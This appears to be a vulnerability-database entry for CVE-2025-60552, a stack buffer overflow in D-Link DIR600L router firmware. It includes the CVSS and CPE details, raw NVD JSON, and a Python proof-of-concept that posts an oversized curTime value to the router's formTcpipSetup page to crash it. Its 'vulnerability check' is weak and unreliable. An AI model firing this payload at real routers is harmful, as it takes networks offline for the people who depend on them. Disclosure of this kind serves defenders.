Security Vulnerability Report
中文
CVE-2025-60552 CVSS 7.5 HIGH

CVE-2025-60552

Published: 2025-10-24 16:19:39
Last Modified: 2025-10-28 02:31:33

Description

D-Link DIR600L Ax FW116WWb01 was discovered to contain a buffer overflow via the curTime parameter in the function formTcpipSetup.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-600l_firmware:1.16wwb01:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-600l:a1:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR600L Ax FW116WWb01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60552 PoC - D-Link DIR600L Ax Buffer Overflow in formTcpipSetup # Target: D-Link DIR600L Ax FW116WWb01 # Vulnerability: Buffer overflow via curTime parameter TARGET_IP = "192.168.0.1" # Default D-Link router IP TARGET_URL = f"http://{TARGET_IP}/formTcpipSetup" def exploit_buffer_overflow(): """ PoC for CVE-2025-60552 This demonstrates the buffer overflow vulnerability in formTcpipSetup function via the curTime parameter. """ # Create a payload with excessive length to trigger buffer overflow # The exact overflow length may vary based on firmware version overflow_length = 1024 # Adjust based on actual buffer size malicious_payload = "A" * overflow_length # Construct the exploit request # The curTime parameter is vulnerable to buffer overflow data = { "curTime": malicious_payload, "submit": "Submit" } try: print(f"[*] Sending exploit payload to {TARGET_URL}") print(f"[*] Payload length: {len(malicious_payload)} bytes") # Send the malicious request response = requests.post(TARGET_URL, data=data, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") print(f"[*] If vulnerable, the router may crash or become unresponsive") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-60552 """ # Small test payload to check for vulnerability indicators test_payload = "A" * 100 data = {"curTime": test_payload} try: response = requests.post(TARGET_URL, data=data, timeout=10) # If we get a response without error, the parameter is processed # Further analysis needed to confirm vulnerability return True except: return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-60552 D-Link DIR600L Ax Buffer Overflow PoC") print("=" * 60) # Check vulnerability if check_vulnerability(): print("[*] Target appears to be running the vulnerable service") # Uncomment to actually exploit # exploit_buffer_overflow() else: print("[-] Target does not appear vulnerable or is unreachable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60552", "sourceIdentifier": "[email protected]", "published": "2025-10-24T16:19:38.860", "lastModified": "2025-10-28T02:31:33.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link DIR600L Ax FW116WWb01 was discovered to contain a buffer overflow via the curTime parameter in the function formTcpipSetup."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-600l_firmware:1.16wwb01:*:*:*:*:*:*:*", "matchCriteriaId": "26C58719-CA17-439C-8A0C-349F6E2BB578"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-600l:a1:*:*:*:*:*:*:*", "matchCriteriaId": "F75E7D9C-03BE-4301-AF9E-9929C33F4EEA"}]}]}], "references": [{"url": "https://github.com/luckysmallbird/DLINK-DIR600LAx-Vulnerability/blob/main/06-buffer%20overflow-formTcpipSetup.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}